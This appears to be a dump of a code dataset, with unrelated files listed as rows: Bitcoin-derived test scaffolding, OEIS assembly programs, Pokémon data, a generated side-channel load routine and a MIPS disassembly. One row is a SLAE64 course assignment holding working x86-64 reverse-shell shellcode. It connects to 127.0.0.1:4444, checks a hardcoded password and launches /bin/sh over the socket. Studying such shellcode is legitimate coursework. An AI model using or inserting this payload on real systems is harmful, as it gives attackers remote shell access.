text stringlengths 1 1.05M |
|---|
// Copyright (c) 2011-2013 The Bitcoin Core developers
// Copyright (c) 2017-2018 The CruZeta developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#define BOOST_TEST_MODULE Bitcoin Test Suite
#include "test_bitcoin.h"
#include "crypto/common.h"
#include "key.h"
#include "main.h"
#include "random.h"
#include "txdb.h"
#include "txmempool.h"
#include "ui_interface.h"
#include "rpc/server.h"
#include "rpc/register.h"
#include "util.h"
#ifdef ENABLE_WALLET
#include "wallet/db.h"
#include "wallet/wallet.h"
#endif
#include <boost/filesystem.hpp>
#include <boost/test/unit_test.hpp>
#include <boost/thread.hpp>
#include "librustzcash.h"
CClientUIInterface uiInterface; // Declared but not defined in ui_interface.h
CWallet* pwalletMain;
ZCJoinSplit *pzcashParams;
std::unique_ptr<CConnman> g_connman;
extern bool fPrintToConsole;
extern void noui_connect();
JoinSplitTestingSetup::JoinSplitTestingSetup()
{
boost::filesystem::path pk_path = ZC_GetParamsDir() / "sprout-proving.key";
boost::filesystem::path vk_path = ZC_GetParamsDir() / "sprout-verifying.key";
pzcashParams = ZCJoinSplit::Prepared(vk_path.string(), pk_path.string());
boost::filesystem::path sapling_spend = ZC_GetParamsDir() / "sapling-spend.params";
boost::filesystem::path sapling_output = ZC_GetParamsDir() / "sapling-output.params";
boost::filesystem::path sprout_groth16 = ZC_GetParamsDir() / "sprout-groth16.params";
static_assert(
sizeof(boost::filesystem::path::value_type) == sizeof(codeunit),
"librustzcash not configured correctly");
auto sapling_spend_str = sapling_spend.native();
auto sapling_output_str = sapling_output.native();
auto sprout_groth16_str = sprout_groth16.native();
librustzcash_init_zksnark_params(
reinterpret_cast<const codeunit*>(sapling_spend_str.c_str()),
sapling_spend_str.length(),
"8270785a1a0d0bc77196f000ee6d221c9c9894f55307bd9357c3f0105d31ca63991ab91324160d8f53e2bbd3c2633a6eb8bdf5205d822e7f3f73edac51b2b70c",
reinterpret_cast<const codeunit*>(sapling_output_str.c_str()),
sapling_output_str.length(),
"657e3d38dbb5cb5e7dd2970e8b03d69b4787dd907285b5a7f0790dcc8072f60bf593b32cc2d1c030e00ff5ae64bf84c5c3beb84ddc841d48264b4a171744d028",
reinterpret_cast<const codeunit*>(sprout_groth16_str.c_str()),
sprout_groth16_str.length(),
"e9b238411bd6c0ec4791e9d04245ec350c9c5744f5610dfcce4365d5ca49dfefd5054e371842b3f88fa1b9d7e8e075249b3ebabd167fa8b0f3161292d36c180a"
);
}
JoinSplitTestingSetup::~JoinSplitTestingSetup()
{
delete pzcashParams;
}
BasicTestingSetup::BasicTestingSetup()
{
assert(init_and_check_sodium() != -1);
ECC_Start();
SetupEnvironment();
SetupNetworking();
fPrintToDebugLog = false; // don't want to write to debug.log file
fCheckBlockIndex = true;
SelectParams(CBaseChainParams::MAIN);
}
BasicTestingSetup::~BasicTestingSetup()
{
ECC_Stop();
g_connman.reset();
}
TestingSetup::TestingSetup()
{
const CChainParams& chainparams = Params();
// Ideally we'd move all the RPC tests to the functional testing framework
// instead of unit tests, but for now we need these here.
RegisterAllCoreRPCCommands(tableRPC);
#ifdef ENABLE_WALLET
bitdb.MakeMock();
RegisterWalletRPCCommands(tableRPC);
#endif
// Save current path, in case a test changes it
orig_current_path = boost::filesystem::current_path();
ClearDatadirCache();
pathTemp = GetTempPath() / strprintf("test_bitcoin_%lu_%i", (unsigned long)GetTime(), (int)(GetRand(100000)));
boost::filesystem::create_directories(pathTemp);
mapArgs["-datadir"] = pathTemp.string();
pblocktree = new CBlockTreeDB(1 << 20, true);
pcoinsdbview = new CCoinsViewDB(1 << 23, true);
pcoinsTip = new CCoinsViewCache(pcoinsdbview);
InitBlockIndex(chainparams);
#ifdef ENABLE_WALLET
bool fFirstRun;
pwalletMain = new CWallet("wallet.dat");
pwalletMain->LoadWallet(fFirstRun);
RegisterValidationInterface(pwalletMain);
#endif
nScriptCheckThreads = 3;
for (int i=0; i < nScriptCheckThreads-1; i++)
threadGroup.create_thread(&ThreadScriptCheck);
g_connman = std::unique_ptr<CConnman>(new CConnman());
connman = g_connman.get();
RegisterNodeSignals(GetNodeSignals());
}
TestingSetup::~TestingSetup()
{
UnregisterNodeSignals(GetNodeSignals());
threadGroup.interrupt_all();
threadGroup.join_all();
#ifdef ENABLE_WALLET
UnregisterValidationInterface(pwalletMain);
delete pwalletMain;
pwalletMain = NULL;
#endif
UnloadBlockIndex();
delete pcoinsTip;
delete pcoinsdbview;
delete pblocktree;
#ifdef ENABLE_WALLET
bitdb.Flush(true);
bitdb.Reset();
#endif
// Restore the previous current path so temporary directory can be deleted
boost::filesystem::current_path(orig_current_path);
boost::filesystem::remove_all(pathTemp);
}
CTxMemPoolEntry TestMemPoolEntryHelper::FromTx(CMutableTransaction &tx, CTxMemPool *pool) {
return CTxMemPoolEntry(tx, nFee, nTime, dPriority, nHeight,
pool ? pool->HasNoInputsOf(tx) : hadNoDependencies,
spendsCoinbase, nBranchId);
}
void Shutdown(void* parg)
{
exit(0);
}
void StartShutdown()
{
exit(0);
}
bool ShutdownRequested()
{
return false;
}
|
; A182619: Number of vertices that are connected to two edges in a spiral without holes constructed with n hexagons.
; Submitted by Jon Maiga
; 6,8,9,10,11,12,12,13,14,14,15,15,16,16,17,17,18,18,18,19,19,20,20,20,21,21,21,22,22,22,23,23,23,24,24,24,24
mul $0,4
add $0,2
mul $0,3
mov $1,3
lpb $0
sub $0,$1
add $1,2
lpe
mov $0,$1
add $0,1
div $0,2
add $0,3
|
db TENTACOOL ; 072
db 40, 40, 35, 70, 50, 100
; hp atk def spd sat sdf
db WATER, POISON ; type
db 190 ; catch rate
db 105 ; base exp
db NO_ITEM, NO_ITEM ; items
db GENDER_F50 ; gender ratio
db 100 ; unknown 1
db 20 ; step cycles to hatch
db 5 ; unknown 2
INCBIN "gfx/pokemon/tentacool/front.dimensions"
db 0, 0, 0, 0 ; padding
db GROWTH_SLOW ; growth rate
dn EGG_WATER_3, EGG_WATER_3 ; egg groups
; tm/hm learnset
tmhm CURSE, TOXIC, HIDDEN_POWER, SNORE, BLIZZARD, ICY_WIND, PROTECT, RAIN_DANCE, GIGA_DRAIN, ENDURE, FRUSTRATION, RETURN, DOUBLE_TEAM, SWAGGER, SLEEP_TALK, SLUDGE_BOMB, REST, ATTRACT, CUT, SURF, WHIRLPOOL, ICE_BEAM
; end
|
; A005442: a(n) = n!*Fibonacci(n+1).
; Submitted by Jamie Morken(s1)
; 1,1,4,18,120,960,9360,105840,1370880,19958400,322963200,5748019200,111607372800,2347586841600,53178757632000,1290674601216000,33413695451136000,919096314200064000,26768324463648768000,822929104265748480000,26630545381501501440000,904871676803145891840000,32210488855922903285760000,1198706312148618596843520000,46549141340036288937984000000,1882952320790078381555712000000,79213702211565625730138112000000,3460602488906906918565838848000000,156782428561337006771827900416000000
mov $3,1
lpb $0
mov $2,$3
add $3,$1
mov $1,$0
sub $0,1
mul $3,$1
mul $1,$2
lpe
mov $0,$3
|
; A212976: Number of (w,x,y) with all terms in {0,...,n} and odd range.
; 0,6,12,36,60,114,168,264,360,510,660,876,1092,1386,1680,2064,2448,2934,3420,4020,4620,5346,6072,6936,7800,8814,9828,11004,12180,13530,14880,16416,17952,19686,21420,23364,25308,27474,29640,32040
mov $12,$0
mov $14,$0
lpb $14,1
clr $0,12
mov $0,$12
sub $14,1
sub $0,$14
mov $9,$0
mov $11,$0
lpb $11,1
mov $0,$9
sub $11,1
sub $0,$11
mov $2,$0
mov $8,$0
lpb $2,1
mod $2,2
mul $2,6
mul $8,$2
mov $1,$8
trn $2,$8
lpe
add $10,$1
lpe
add $13,$10
lpe
mov $1,$13
|
#include<bits/stdc++.h>
using namespace std;
typedef long long int ll;
typedef unsigned long long int ull;
typedef long double ld;
#define MOD 1000000007
#define INF 1000000000000000000
#define endll "\n"
#define pb push_back
#define forn(i,n) for(i=0;i<n;i++)
#define forab(i,a,b) for(i=a;i<=b;i++)
#define vpll vector<pair<ll,ll>>
#define pll pair<ll,ll>
#define vll vector<ll>
#define ff first
#define ss second
#define bs binary_search
#define lb lower_bound
#define ub upper_bound
#define test ll t;cin>>t; while(t--)
#define fast_io ios_base::sync_with_stdio(false);cin.tie(NULL);cout.tie(NULL);
void inverseBWT(string s)
{
ll l=s.length();
ll i,j;
vector<pair<char,ll>> v;
for(i=0;i<l;i++)
v.pb({s[i],i});
sort(v.begin(),v.end());
pair<char,ll> x;
x=v[0];
for(i=0;i<l;i++)
{
x=v[x.ss];
cout<<x.ff;
}
}
int main()
{
fast_io;
string s;
cin>>s;
inverseBWT(s);
return 0;
}
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r15
push %r9
push %rbx
push %rdi
push %rsi
lea addresses_WT_ht+0x288f, %rdi
clflush (%rdi)
nop
nop
nop
nop
and $38612, %rsi
movups (%rdi), %xmm1
vpextrq $0, %xmm1, %r10
sub %rbx, %rbx
lea addresses_normal_ht+0xb26b, %r9
nop
nop
nop
nop
nop
cmp %rdi, %rdi
mov (%r9), %r13
nop
nop
nop
nop
nop
and %rbx, %rbx
lea addresses_UC_ht+0x7eb, %r10
nop
nop
add %r15, %r15
mov $0x6162636465666768, %rdi
movq %rdi, %xmm6
and $0xffffffffffffffc0, %r10
vmovaps %ymm6, (%r10)
add %rbx, %rbx
pop %rsi
pop %rdi
pop %rbx
pop %r9
pop %r15
pop %r13
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r13
push %r15
push %r8
push %r9
push %rbp
push %rcx
push %rdi
push %rsi
// Load
lea addresses_UC+0xfe6b, %r12
nop
sub %r8, %r8
movups (%r12), %xmm3
vpextrq $0, %xmm3, %rcx
nop
cmp $14521, %rcx
// Store
lea addresses_UC+0x765b, %rbp
inc %r15
mov $0x5152535455565758, %r12
movq %r12, %xmm3
movups %xmm3, (%rbp)
xor %r9, %r9
// REPMOV
lea addresses_normal+0xeb35, %rsi
lea addresses_D+0x612b, %rdi
nop
inc %r8
mov $24, %rcx
rep movsb
nop
nop
nop
nop
sub %r8, %r8
// Store
lea addresses_normal+0x1e0eb, %r15
clflush (%r15)
nop
nop
nop
nop
nop
xor %rdi, %rdi
mov $0x5152535455565758, %r13
movq %r13, %xmm4
vmovaps %ymm4, (%r15)
nop
nop
cmp $34237, %rsi
// Store
lea addresses_UC+0x10ab, %rsi
nop
nop
xor %r15, %r15
movl $0x51525354, (%rsi)
nop
nop
nop
nop
nop
xor %r15, %r15
// Store
lea addresses_WT+0x1c4cb, %rsi
clflush (%rsi)
nop
nop
nop
nop
nop
and $38853, %rbp
movl $0x51525354, (%rsi)
nop
nop
sub %rdi, %rdi
// Load
mov $0x6f3a60000000d6b, %rcx
add %rsi, %rsi
mov (%rcx), %r9
nop
nop
nop
nop
add %rdi, %rdi
// Load
lea addresses_UC+0x1fcb6, %rdi
clflush (%rdi)
nop
sub %r8, %r8
mov (%rdi), %ecx
nop
nop
nop
nop
nop
inc %rsi
// Faulty Load
lea addresses_D+0x1016b, %r12
nop
nop
nop
and $43545, %r9
mov (%r12), %r8w
lea oracles, %rsi
and $0xff, %r8
shlq $12, %r8
mov (%rsi,%r8,1), %r8
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %r9
pop %r8
pop %r15
pop %r13
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': False, 'type': 'addresses_D'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 6, 'same': False, 'type': 'addresses_UC'}, 'OP': 'LOAD'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 4, 'same': False, 'type': 'addresses_UC'}, 'OP': 'STOR'}
{'src': {'congruent': 1, 'same': False, 'type': 'addresses_normal'}, 'dst': {'congruent': 5, 'same': False, 'type': 'addresses_D'}, 'OP': 'REPM'}
{'dst': {'NT': False, 'AVXalign': True, 'size': 32, 'congruent': 7, 'same': False, 'type': 'addresses_normal'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 6, 'same': False, 'type': 'addresses_UC'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 5, 'same': False, 'type': 'addresses_WT'}, 'OP': 'STOR'}
{'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 10, 'same': False, 'type': 'addresses_NC'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': False, 'type': 'addresses_UC'}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 0, 'same': True, 'type': 'addresses_D'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 1, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 8, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'}
{'dst': {'NT': False, 'AVXalign': True, 'size': 32, 'congruent': 4, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'STOR'}
{'36': 6}
36 36 36 36 36 36
*/
|
; SLAE64 assignment 2
; by Jasper Lievisse Adriaanse
; Student ID: SLAE64-1614
global _start
%define SYS_WRITE 1
%define SYS_DUP2 33
%define SYS_SOCKET 41
%define SYS_EXECVE 59
%define SYS_CONNECT 42
section .text
_start:
; Start by opening a socket(2)
; syscall:
; socket: 41 on Linux/x86_64
; arguments:
; %rdi: AF_INET = 2
; %rsi: SOCK_STREAM = 1
; %rdx: 0
; returns:
; %rax: socket file descriptor
mov al, SYS_SOCKET
mov dil, 0x2
mov sil, 0x1
xor rdx, rdx
syscall
; The connect(2) syscall expects the socket fd to be in %rdi, so
; copy it there already.
mov rdi, rax
; Setup server struct sockaddr_in on the stack (in reverse order).
; Now, we need to take care to prevent a null byte from sneaking in when
; saving AF_INET. So clear the full 16 bytes we need (double %rax push)
; and build the stack on top of the zeroed area.
;
; Struct members (in reverse order):
; sin_zero: 0
; sin_addr.s_addr: 127.0.0.1
; sin_port: 4444 (in network byteorder)
; sin_family: AF_INET = 2
xor rax, rax
push rax ; sin_zero
; Since 127.0.0.1 would be written as 0x0100007f contains two NULL bytes
; we need a different way of representing this address. In this case we
; XOR it with mask of ones before storing it on the stack.
mov r13d, 0x1011116e ; result of 0x0100007f ^ 0x11111111
xor r13d, 0x11111111
mov dword [rsp-4], r13d ; Finally push 0x0100007f onto the stack
mov word [rsp-6], 0x5c11
xor r13, r13 ; Clear %r13
mov r13b, 0x2 ; Write 0x2 to the lower 8 bits
mov word [rsp-8], r13w ; Move the lower 16 bits (including on NULL byte) to the stack
sub rsp, 8
; Invoke the connect(2) syscall to establish a connection to the configured
; remote (127.0.0.1) in this case.
; syscall:
; connect: 42 on Linux/x86_64
; arguments:
; %rdi: socket fd as returned by socket(2)
; %rsi: stack pointer (referencing struct sockaddr)
; %rdx: 16 (sizeof sockaddr)
; returns:
; %rax: 0 if succesful (ignored)
mov al, SYS_CONNECT
mov rsi, rsp
add rdx, 0x10
syscall
; Saves 8 bytes
; Now duplicate the required file descriptors for STDIN, STDOUT and STDERR with dup2(2).
; syscall:
; dup2: 3 on Linux/x86_64
; arguments:
; %rdi: socket fd
; %rsi: fd to duplicate
; returns:
; %rax: 0 if succesful (ignored)
xor rsi, rsi
xor rcx, rcx
mov cl, 0x2 ; upperlimit for our loop corresponding to STDERR (2)
; Now use a loop to increment the number in %rsi to match the file descriptor
; to operate on.
dup:
push rcx
xor rax, rax
mov al, SYS_DUP2
syscall
inc rsi
pop rcx
loop dup
; Since we don't get a shell prompt, we might as well print a password prompt.
; syscall:
; write: 0 on Linux/x86_64
; arguments:
; %rdi: socket fd with the connecting client
; %rsi: pointer to a string on the stack
; %rdx: number of bytes to write
xor rax, rax
add al, SYS_WRITE
xor rsi, rsi
push rsi ; push terminating NULL to the stack
mov rsi, 0x203a64726f777373
push rsi
mov rsi, 0x6170207265746e65
push rsi
mov rsi, rsp ; load address to our prompt ('enter password:') into %rsi
xor rdx, rdx
mov dl, 16 ; size of our prompt
syscall
; The password is 'taptap!!'
mov rbx, 0x2121706174706174
; Read the password provided on the socket fd with read(2)
; syscall:
; read: 0 on Linux/x86_64
; arguments:
; %rdi: saved socket fd
; %rsi: buffer (on the stack) to read data into
; %rdx: number of bytes to read
xor rax, rax
sub rsp, 8 ; allocate 8 bytes of storage on the stack
mov rsi, rsp
mov rdx, rax
add rdx, 8
syscall
cmp rbx, [rsi] ; now perform a raw compare of the buffer pointed to by %rsi
jnz fail ; if the comparison didn't result in ZF being set, abort.
; Now we need to setup the stack for the execve(2) syscall and call it to
; execute our shell.
; syscall:
; execve: 59 on Linux/x86_64
; arguments:
; %rdi: pointer address of our /bin//sh string on the stack
; %rsi: idem
; %rdx: NULL
; returns:
; does not return here we terminate afterwards
push r15 ; \0 to terminate our /bin//sh string
; Now push the string /bin//sh (in reverse) onto the stack
mov rax, 0x68732f2f6e69622f
push rax
mov rdi, rsp ; address to the string
push r15 ; NULL for %RDX
mov rdx, rsp ; point to the NULL
push rdi ; Put the address in %RDI on the stack
mov rsi, rsp ; and put it in %RSI whilst having %RSP adjusted
mov rax, r15 ; setup %RAX for execve() and off we go!
add al, SYS_EXECVE
syscall
fail:
xor rax, rax
mov rdi, rax
mov al, 60
mov dil, 1
syscall
|
user/mytest.b: file format elf32-tradbigmips
Disassembly of section .text:
00400000 <_start>:
400000: 8fa40000 lw a0,0(sp)
400004: 8fa50004 lw a1,4(sp)
400008: 0c1002f8 jal 400be0 <libmain>
40000c: 00000000 nop
400010: 00000000 nop
00400014 <__asm_pgfault_handler>:
400014: 00000000 nop
400018: 8fa4008c lw a0,140(sp)
40001c: 3c090040 lui t1,0x40
400020: 8d296010 lw t1,24592(t1)
400024: 0120f809 jalr t1
400028: 00000000 nop
40002c: 8fa30088 lw v1,136(sp)
400030: 00600013 mtlo v1
400034: 8fa20084 lw v0,132(sp)
400038: 8fa30094 lw v1,148(sp)
40003c: 00400011 mthi v0
400040: 40837000 mtc0 v1,$14
400044: 8fbf007c lw ra,124(sp)
400048: 8fbe0078 lw s8,120(sp)
40004c: 8fbc0070 lw gp,112(sp)
400050: 8fb90064 lw t9,100(sp)
400054: 8fb80060 lw t8,96(sp)
400058: 8fb7005c lw s7,92(sp)
40005c: 8fb60058 lw s6,88(sp)
400060: 8fb50054 lw s5,84(sp)
400064: 8fb40050 lw s4,80(sp)
400068: 8fb3004c lw s3,76(sp)
40006c: 8fb20048 lw s2,72(sp)
400070: 8fb10044 lw s1,68(sp)
400074: 8fb00040 lw s0,64(sp)
400078: 8faf003c lw t7,60(sp)
40007c: 8fae0038 lw t6,56(sp)
400080: 8fad0034 lw t5,52(sp)
400084: 8fac0030 lw t4,48(sp)
400088: 8fab002c lw t3,44(sp)
40008c: 8faa0028 lw t2,40(sp)
400090: 8fa90024 lw t1,36(sp)
400094: 8fa80020 lw t0,32(sp)
400098: 8fa7001c lw a3,28(sp)
40009c: 8fa60018 lw a2,24(sp)
4000a0: 8fa50014 lw a1,20(sp)
4000a4: 8fa40010 lw a0,16(sp)
4000a8: 8fa3000c lw v1,12(sp)
4000ac: 8fa20008 lw v0,8(sp)
4000b0: 8fa10004 lw at,4(sp)
4000b4: 8fba0094 lw k0,148(sp)
4000b8: 03400008 jr k0
4000bc: 8fbd0074 lw sp,116(sp)
004000c0 <msyscall>:
4000c0: 0000000c syscall
4000c4: 03e00008 jr ra
4000c8: 00000000 nop
4000cc: 00000000 nop
004000d0 <get_sp>:
4000d0: 03e00008 jr ra
4000d4: 03a01021 move v0,sp
...
004000e0 <umain>:
4000e0: 27bdffe8 addiu sp,sp,-24
4000e4: afbf0010 sw ra,16(sp)
4000e8: 0c1003ea jal 400fa8 <fork>
4000ec: 00000000 nop
4000f0: 14400017 bnez v0,400150 <umain+0x70>
4000f4: 3c020041 lui v0,0x41
4000f8: 0c100484 jal 401210 <tfork>
4000fc: 00000000 nop
400100: 1440000a bnez v0,40012c <umain+0x4c>
400104: 3c020041 lui v0,0x41
400108: 8c458000 lw a1,-32768(v0)
40010c: 00000000 nop
400110: 24a50003 addiu a1,a1,3
400114: ac458000 sw a1,-32768(v0)
400118: 3c040040 lui a0,0x40
40011c: 0c100086 jal 400218 <writef>
400120: 24847210 addiu a0,a0,29200
400124: 1000ffff b 400124 <umain+0x44>
400128: 00000000 nop
40012c: 8c458000 lw a1,-32768(v0)
400130: 00000000 nop
400134: 24a50002 addiu a1,a1,2
400138: ac458000 sw a1,-32768(v0)
40013c: 3c040040 lui a0,0x40
400140: 0c100086 jal 400218 <writef>
400144: 24847228 addiu a0,a0,29224
400148: 1000ffff b 400148 <umain+0x68>
40014c: 00000000 nop
400150: 8c458000 lw a1,-32768(v0)
400154: 00000000 nop
400158: 24a50001 addiu a1,a1,1
40015c: ac458000 sw a1,-32768(v0)
400160: 3c040040 lui a0,0x40
400164: 0c100086 jal 400218 <writef>
400168: 24847240 addiu a0,a0,29248
40016c: 1000ffff b 40016c <umain+0x8c>
400170: 00000000 nop
...
00400180 <user_myoutput>:
400180: 27bdffe0 addiu sp,sp,-32
400184: afbf001c sw ra,28(sp)
400188: afb20018 sw s2,24(sp)
40018c: afb10014 sw s1,20(sp)
400190: afb00010 sw s0,16(sp)
400194: 24020001 li v0,1
400198: 14c20015 bne a2,v0,4001f0 <user_myoutput+0x70>
40019c: 00c09021 move s2,a2
4001a0: 80a20000 lb v0,0(a1)
4001a4: 00000000 nop
4001a8: 14400013 bnez v0,4001f8 <user_myoutput+0x78>
4001ac: 00a08021 move s0,a1
4001b0: 10000013 b 400200 <user_myoutput+0x80>
4001b4: 00000000 nop
4001b8: 82040000 lb a0,0(s0)
4001bc: 0c10052c jal 4014b0 <syscall_putchar>
4001c0: 00000000 nop
4001c4: 82030000 lb v1,0(s0)
4001c8: 2402000a li v0,10
4001cc: 14620003 bne v1,v0,4001dc <user_myoutput+0x5c>
4001d0: 00000000 nop
4001d4: 0c10052c jal 4014b0 <syscall_putchar>
4001d8: 2404000a li a0,10
4001dc: 26310001 addiu s1,s1,1
4001e0: 12510007 beq s2,s1,400200 <user_myoutput+0x80>
4001e4: 26100001 addiu s0,s0,1
4001e8: 1000fff3 b 4001b8 <user_myoutput+0x38>
4001ec: 00000000 nop
4001f0: 18c00003 blez a2,400200 <user_myoutput+0x80>
4001f4: 00a08021 move s0,a1
4001f8: 1000ffef b 4001b8 <user_myoutput+0x38>
4001fc: 00008821 move s1,zero
400200: 8fbf001c lw ra,28(sp)
400204: 8fb20018 lw s2,24(sp)
400208: 8fb10014 lw s1,20(sp)
40020c: 8fb00010 lw s0,16(sp)
400210: 03e00008 jr ra
400214: 27bd0020 addiu sp,sp,32
00400218 <writef>:
400218: 27bdffe0 addiu sp,sp,-32
40021c: afbf0018 sw ra,24(sp)
400220: afa50024 sw a1,36(sp)
400224: afa60028 sw a2,40(sp)
400228: afa7002c sw a3,44(sp)
40022c: 00803021 move a2,a0
400230: 27a70024 addiu a3,sp,36
400234: afa70010 sw a3,16(sp)
400238: 3c040040 lui a0,0x40
40023c: 24840180 addiu a0,a0,384
400240: 0c1000b0 jal 4002c0 <user_lp_Print>
400244: 00002821 move a1,zero
400248: 8fbf0018 lw ra,24(sp)
40024c: 00000000 nop
400250: 03e00008 jr ra
400254: 27bd0020 addiu sp,sp,32
00400258 <_user_panic>:
400258: 27bdffe0 addiu sp,sp,-32
40025c: afbf001c sw ra,28(sp)
400260: afb00018 sw s0,24(sp)
400264: 00801821 move v1,a0
400268: 00a04021 move t0,a1
40026c: afa7002c sw a3,44(sp)
400270: 00c08021 move s0,a2
400274: 27a2002c addiu v0,sp,44
400278: afa20010 sw v0,16(sp)
40027c: 3c040040 lui a0,0x40
400280: 24847258 addiu a0,a0,29272
400284: 00602821 move a1,v1
400288: 0c100086 jal 400218 <writef>
40028c: 01003021 move a2,t0
400290: 3c040040 lui a0,0x40
400294: 24840180 addiu a0,a0,384
400298: 00002821 move a1,zero
40029c: 8fa70010 lw a3,16(sp)
4002a0: 0c1000b0 jal 4002c0 <user_lp_Print>
4002a4: 02003021 move a2,s0
4002a8: 3c040040 lui a0,0x40
4002ac: 0c100086 jal 400218 <writef>
4002b0: 2484752c addiu a0,a0,29996
4002b4: 1000ffff b 4002b4 <_user_panic+0x5c>
4002b8: 00000000 nop
4002bc: 00000000 nop
004002c0 <user_lp_Print>:
4002c0: 27bdfbd8 addiu sp,sp,-1064
4002c4: afbf0420 sw ra,1056(sp)
4002c8: afb5041c sw s5,1052(sp)
4002cc: afb40418 sw s4,1048(sp)
4002d0: afb30414 sw s3,1044(sp)
4002d4: afb20410 sw s2,1040(sp)
4002d8: afb1040c sw s1,1036(sp)
4002dc: afb00408 sw s0,1032(sp)
4002e0: 0080a821 move s5,a0
4002e4: 00a09021 move s2,a1
4002e8: 00c02821 move a1,a2
4002ec: 00e09821 move s3,a3
4002f0: 80a30000 lb v1,0(a1)
4002f4: 00000000 nop
4002f8: 1060000d beqz v1,400330 <user_lp_Print+0x70>
4002fc: 00a08021 move s0,a1
400300: 1000015e b 40087c <user_lp_Print+0x5bc>
400304: 24020025 li v0,37
400308: 00a08021 move s0,a1
40030c: 26100001 addiu s0,s0,1
400310: 82020000 lb v0,0(s0)
400314: 00000000 nop
400318: 10400006 beqz v0,400334 <user_lp_Print+0x74>
40031c: 02058823 subu s1,s0,a1
400320: 10430005 beq v0,v1,400338 <user_lp_Print+0x78>
400324: 2e2203e9 sltiu v0,s1,1001
400328: 1000fff9 b 400310 <user_lp_Print+0x50>
40032c: 26100001 addiu s0,s0,1
400330: 02058823 subu s1,s0,a1
400334: 2e2203e9 sltiu v0,s1,1001
400338: 14400008 bnez v0,40035c <user_lp_Print+0x9c>
40033c: 02203021 move a2,s1
400340: 02402021 move a0,s2
400344: 3c050040 lui a1,0x40
400348: 24a57000 addiu a1,a1,28672
40034c: 02a0f809 jalr s5
400350: 2406001d li a2,29
400354: 1000ffff b 400354 <user_lp_Print+0x94>
400358: 00000000 nop
40035c: 02a0f809 jalr s5
400360: 02402021 move a0,s2
400364: 82020000 lb v0,0(s0)
400368: 00000000 nop
40036c: 10400135 beqz v0,400844 <user_lp_Print+0x584>
400370: 02519021 addu s2,s2,s1
400374: 82030001 lb v1,1(s0)
400378: 2402006c li v0,108
40037c: 10620003 beq v1,v0,40038c <user_lp_Print+0xcc>
400380: 26110001 addiu s1,s0,1
400384: 10000003 b 400394 <user_lp_Print+0xd4>
400388: 00002021 move a0,zero
40038c: 26110002 addiu s1,s0,2
400390: 24040001 li a0,1
400394: 82230000 lb v1,0(s1)
400398: 2402002d li v0,45
40039c: 14620004 bne v1,v0,4003b0 <user_lp_Print+0xf0>
4003a0: 00003821 move a3,zero
4003a4: 26310001 addiu s1,s1,1
4003a8: 24070001 li a3,1
4003ac: 82230000 lb v1,0(s1)
4003b0: 24020030 li v0,48
4003b4: 14620003 bne v1,v0,4003c4 <user_lp_Print+0x104>
4003b8: 24090020 li t1,32
4003bc: 26310001 addiu s1,s1,1
4003c0: 24090030 li t1,48
4003c4: 82260000 lb a2,0(s1)
4003c8: 00000000 nop
4003cc: 24c2ffd0 addiu v0,a2,-48
4003d0: 304200ff andi v0,v0,0xff
4003d4: 2c42000a sltiu v0,v0,10
4003d8: 1040000e beqz v0,400414 <user_lp_Print+0x154>
4003dc: 00004021 move t0,zero
4003e0: 00081040 sll v0,t0,0x1
4003e4: 000818c0 sll v1,t0,0x3
4003e8: 00431021 addu v0,v0,v1
4003ec: 00461021 addu v0,v0,a2
4003f0: 2448ffd0 addiu t0,v0,-48
4003f4: 26310001 addiu s1,s1,1
4003f8: 82260000 lb a2,0(s1)
4003fc: 00000000 nop
400400: 24c2ffd0 addiu v0,a2,-48
400404: 304200ff andi v0,v0,0xff
400408: 2c42000a sltiu v0,v0,10
40040c: 1440fff5 bnez v0,4003e4 <user_lp_Print+0x124>
400410: 00081040 sll v0,t0,0x1
400414: 82230000 lb v1,0(s1)
400418: 2402002e li v0,46
40041c: 14620014 bne v1,v0,400470 <user_lp_Print+0x1b0>
400420: 2c620079 sltiu v0,v1,121
400424: 26310001 addiu s1,s1,1
400428: 92220000 lbu v0,0(s1)
40042c: 00000000 nop
400430: 2442ffd0 addiu v0,v0,-48
400434: 304200ff andi v0,v0,0xff
400438: 2c42000a sltiu v0,v0,10
40043c: 10400009 beqz v0,400464 <user_lp_Print+0x1a4>
400440: 00000000 nop
400444: 26310001 addiu s1,s1,1
400448: 92220000 lbu v0,0(s1)
40044c: 00000000 nop
400450: 2442ffd0 addiu v0,v0,-48
400454: 304200ff andi v0,v0,0xff
400458: 2c42000a sltiu v0,v0,10
40045c: 1440fff9 bnez v0,400444 <user_lp_Print+0x184>
400460: 00000000 nop
400464: 82230000 lb v1,0(s1)
400468: 00000000 nop
40046c: 2c620079 sltiu v0,v1,121
400470: 104000ed beqz v0,400828 <user_lp_Print+0x568>
400474: 00031080 sll v0,v1,0x2
400478: 3c030040 lui v1,0x40
40047c: 24637024 addiu v1,v1,28708
400480: 00431021 addu v0,v0,v1
400484: 8c420000 lw v0,0(v0)
400488: 00000000 nop
40048c: 00400008 jr v0
400490: 00000000 nop
400494: 10800004 beqz a0,4004a8 <user_lp_Print+0x1e8>
400498: 00000000 nop
40049c: 8e650000 lw a1,0(s3)
4004a0: 10000003 b 4004b0 <user_lp_Print+0x1f0>
4004a4: 26730004 addiu s3,s3,4
4004a8: 8e650000 lw a1,0(s3)
